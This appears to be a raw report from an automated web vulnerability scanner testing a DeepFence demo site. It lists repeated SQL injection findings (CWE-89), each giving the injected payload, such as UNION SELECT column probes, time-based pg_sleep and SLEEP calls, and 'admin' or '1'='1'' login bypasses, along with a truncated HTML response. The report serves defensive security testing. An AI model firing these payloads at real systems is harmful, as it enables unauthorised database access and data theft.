html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1732\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1733\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1734Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1735\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1736\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1737\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1738\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1739\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1740\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1741\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1083=1083 AND (1427=\n1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1742\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1743\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1744\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1745\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 